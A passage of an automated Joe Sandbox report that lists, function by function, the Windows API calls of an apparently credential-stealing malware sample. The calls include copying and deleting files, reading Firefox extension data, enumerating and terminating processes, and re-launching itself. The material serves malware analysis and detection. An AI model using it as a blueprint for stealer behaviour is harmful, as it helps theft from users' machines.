                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpynlstrlenwsprintf
                                  • String ID: %s%s
                                  • API String ID: 1206339513-3252725368
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 022E151B
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 022E1522
                                  • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 022E153E
                                  • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 022E155C
                                  • RegCloseKey.ADVAPI32(?), ref: 022E1566
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                  • String ID:
                                  • API String ID: 3225020163-0
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 004012B4
                                  • HeapAlloc.KERNEL32(00000000), ref: 004012BB
                                  • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 004012D7
                                  • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 004012F5
                                  • RegCloseKey.ADVAPI32(?), ref: 004012FF
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocCloseOpenProcessQueryValue
                                  • String ID:
                                  • API String ID: 3466090806-0
                                  APIs
                                  • __getptd.LIBCMT ref: 022FC9B5
                                    • Part of subcall function 022FC206: __getptd_noexit.LIBCMT ref: 022FC209
                                    • Part of subcall function 022FC206: __amsg_exit.LIBCMT ref: 022FC216
                                  • __getptd.LIBCMT ref: 022FC9CC
                                  • __amsg_exit.LIBCMT ref: 022FC9DA
                                  • __lock.LIBCMT ref: 022FC9EA
                                  • __updatetlocinfoEx_nolock.LIBCMT ref: 022FC9FE
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                  • String ID:
                                  • API String ID: 938513278-0
                                  APIs
                                  • __getptd.LIBCMT ref: 0041C74E
                                    • Part of subcall function 0041BF9F: __getptd_noexit.LIBCMT ref: 0041BFA2
                                    • Part of subcall function 0041BF9F: __amsg_exit.LIBCMT ref: 0041BFAF
                                  • __getptd.LIBCMT ref: 0041C765
                                  • __amsg_exit.LIBCMT ref: 0041C773
                                  • __lock.LIBCMT ref: 0041C783
                                  • __updatetlocinfoEx_nolock.LIBCMT ref: 0041C797
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                  • String ID:
                                  • API String ID: 938513278-0
                                  APIs
                                  • StrCmpCA.SHLWAPI(00000000,00883630), ref: 0041079A
                                  • StrCmpCA.SHLWAPI(00000000,00883620), ref: 00410866
                                  • StrCmpCA.SHLWAPI(00000000,008835B0), ref: 0041099D
                                    • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy
                                  • String ID: `_A
                                  • API String ID: 3722407311-2339250863
                                  APIs
                                  • StrCmpCA.SHLWAPI(00000000,00883630), ref: 0041079A
                                  • StrCmpCA.SHLWAPI(00000000,00883620), ref: 00410866
                                  • StrCmpCA.SHLWAPI(00000000,008835B0), ref: 0041099D
                                    • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy
                                  • String ID: `_A
                                  • API String ID: 3722407311-2339250863
                                  APIs
                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 022F68CA
                                    • Part of subcall function 022FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022FA9EF
                                    • Part of subcall function 022FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022FAC2C
                                    • Part of subcall function 022FAC17: lstrcpy.KERNEL32(00000000), ref: 022FAC6B
                                    • Part of subcall function 022FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022FAC79
                                    • Part of subcall function 022FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022FAB6C
                                  • ShellExecuteEx.SHELL32(0000003C), ref: 022F698D
                                  • ExitProcess.KERNEL32 ref: 022F69BC
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                  • String ID: <
                                  • API String ID: 1148417306-4251816714
                                  APIs
                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00416663
                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                  • ShellExecuteEx.SHELL32(0000003C), ref: 00416726
                                  • ExitProcess.KERNEL32 ref: 00416755
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                  • String ID: <
                                  • API String ID: 1148417306-4251816714
                                  APIs
                                  • VirtualProtect.KERNEL32(?,?,@Jn@,@Jn@), ref: 00406C9F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ProtectVirtual
                                  • String ID: @Jn@$Jn@$Jn@
                                  • API String ID: 544645111-1180188686
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                  • lstrcatA.KERNEL32(00000000), ref: 0041A982
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcatlstrcpy
                                  • String ID: vI@$vI@
                                  • API String ID: 3905823039-1245421781
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0041951E,00000000), ref: 00418D5B
                                  • HeapAlloc.KERNEL32(00000000,?,?,0041951E,00000000), ref: 00418D62
                                  • wsprintfW.USER32 ref: 00418D78
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocProcesswsprintf
                                  • String ID: %hs
                                  • API String ID: 659108358-2783943728
                                  APIs
                                    • Part of subcall function 022FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022FA9EF
                                    • Part of subcall function 022FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022FAC2C
                                    • Part of subcall function 022FAC17: lstrcpy.KERNEL32(00000000), ref: 022FAC6B
                                    • Part of subcall function 022FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022FAC79
                                    • Part of subcall function 022FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022FAB6C
                                    • Part of subcall function 022F8DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,022E1660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 022F8DED
                                    • Part of subcall function 022FAB87: lstrcpy.KERNEL32(00000000,?), ref: 022FABD9
                                    • Part of subcall function 022FAB87: lstrcat.KERNEL32(00000000), ref: 022FABE9
                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 022EA548
                                  • lstrlen.KERNEL32(00000000,00000000), ref: 022EA666
                                  • lstrlen.KERNEL32(00000000), ref: 022EA923
                                    • Part of subcall function 022FAA07: lstrcpy.KERNEL32(?,00000000), ref: 022FAA4D
                                    • Part of subcall function 022EA077: memcmp.MSVCRT(?,00421264,00000003), ref: 022EA094
                                  • DeleteFileA.KERNEL32(00000000), ref: 022EA9AA
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTimememcmp
                                  • String ID:
                                  • API String ID: 257331557-0
                                  APIs
                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                    • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,008855F0,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                    • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                    • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040A2E1
                                  • lstrlenA.KERNEL32(00000000,00000000), ref: 0040A3FF
                                  • lstrlenA.KERNEL32(00000000), ref: 0040A6BC
                                    • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                    • Part of subcall function 00409E10: memcmp.MSVCRT(?,v20,00000003), ref: 00409E2D
                                  • DeleteFileA.KERNEL32(00000000), ref: 0040A743
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTimememcmp
                                  • String ID:
                                  • API String ID: 257331557-0
                                  APIs
                                    • Part of subcall function 022FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022FA9EF
                                    • Part of subcall function 022FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022FAC2C
                                    • Part of subcall function 022FAC17: lstrcpy.KERNEL32(00000000), ref: 022FAC6B
                                    • Part of subcall function 022FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022FAC79
                                    • Part of subcall function 022FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022FAB6C
                                    • Part of subcall function 022F8DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,022E1660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 022F8DED
                                    • Part of subcall function 022FAB87: lstrcpy.KERNEL32(00000000,?), ref: 022FABD9
                                    • Part of subcall function 022FAB87: lstrcat.KERNEL32(00000000), ref: 022FABE9
                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 022ED6E8
                                  • lstrlen.KERNEL32(00000000), ref: 022ED8FF
                                  • lstrlen.KERNEL32(00000000), ref: 022ED913
                                  • DeleteFileA.KERNEL32(00000000), ref: 022ED992
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                  • String ID:
                                  • API String ID: 211194620-0
                                  APIs
                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                    • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,008855F0,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                    • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                    • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040D481
                                  • lstrlenA.KERNEL32(00000000), ref: 0040D698
                                  • lstrlenA.KERNEL32(00000000), ref: 0040D6AC
                                  • DeleteFileA.KERNEL32(00000000), ref: 0040D72B
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                  • String ID:
                                  • API String ID: 211194620-0
                                  APIs
                                    • Part of subcall function 022FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022FA9EF
                                    • Part of subcall function 022FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022FAC2C
                                    • Part of subcall function 022FAC17: lstrcpy.KERNEL32(00000000), ref: 022FAC6B
                                    • Part of subcall function 022FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022FAC79
                                    • Part of subcall function 022FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022FAB6C
                                    • Part of subcall function 022F8DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,022E1660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 022F8DED
                                    • Part of subcall function 022FAB87: lstrcpy.KERNEL32(00000000,?), ref: 022FABD9
                                    • Part of subcall function 022FAB87: lstrcat.KERNEL32(00000000), ref: 022FABE9
                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 022EDA68
                                  • lstrlen.KERNEL32(00000000), ref: 022EDC06
                                  • lstrlen.KERNEL32(00000000), ref: 022EDC1A
                                  • DeleteFileA.KERNEL32(00000000), ref: 022EDC99
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                  • String ID:
                                  • API String ID: 211194620-0
                                  APIs
                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                    • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,008855F0,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                    • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                    • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040D801
                                  • lstrlenA.KERNEL32(00000000), ref: 0040D99F
                                  • lstrlenA.KERNEL32(00000000), ref: 0040D9B3
                                  • DeleteFileA.KERNEL32(00000000), ref: 0040DA32
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                  • String ID:
                                  • API String ID: 211194620-0
                                  APIs
                                    • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                    • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                    • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                    • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                    • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                    • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
                                    • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                    • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                    • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                    • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                  • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00421580,00420D92), ref: 0040F54C
                                  • lstrlenA.KERNEL32(00000000), ref: 0040F56B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                                  • String ID: ^userContextId=4294967295$moz-extension+++
                                  • API String ID: 998311485-3310892237
                                  APIs
                                  • memset.MSVCRT ref: 022F9752
                                    • Part of subcall function 022F8FB7: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,022F9785,00000000), ref: 022F8FC2
                                    • Part of subcall function 022F8FB7: RtlAllocateHeap.NTDLL(00000000), ref: 022F8FC9
                                    • Part of subcall function 022F8FB7: wsprintfW.USER32 ref: 022F8FDF
                                  • OpenProcess.KERNEL32(00001001,00000000,?), ref: 022F9812
                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 022F9830
                                  • CloseHandle.KERNEL32(00000000), ref: 022F983D
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
                                  • String ID:
                                  • API String ID: 3729781310-0
                                  APIs
                                  • memset.MSVCRT ref: 004194EB
                                    • Part of subcall function 00418D50: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0041951E,00000000), ref: 00418D5B
                                    • Part of subcall function 00418D50: HeapAlloc.KERNEL32(00000000,?,?,0041951E,00000000), ref: 00418D62
                                    • Part of subcall function 00418D50: wsprintfW.USER32 ref: 00418D78
                                  • OpenProcess.KERNEL32(00001001,00000000,?), ref: 004195AB
                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 004195C9
                                  • CloseHandle.KERNEL32(00000000), ref: 004195D6
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Process$Heap$AllocCloseHandleOpenTerminatememsetwsprintf
                                  • String ID:
                                  • API String ID: 396451647-0
                                  APIs
                                    • Part of subcall function 022FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022FA9EF
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,004205B7), ref: 022F8931
                                  • Process32First.KERNEL32(?,00000128), ref: 022F8945
                                  • Process32Next.KERNEL32(?,00000128), ref: 022F895A
                                    • Part of subcall function 022FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022FAC2C
                                    • Part of subcall function 022FAC17: lstrcpy.KERNEL32(00000000), ref: 022FAC6B
                                    • Part of subcall function 022FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022FAC79
                                    • Part of subcall function 022FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022FAB6C
                                  • CloseHandle.KERNEL32(?), ref: 022F89C8
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                  • String ID:
                                  • API String ID: 1066202413-0
                                  APIs
                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
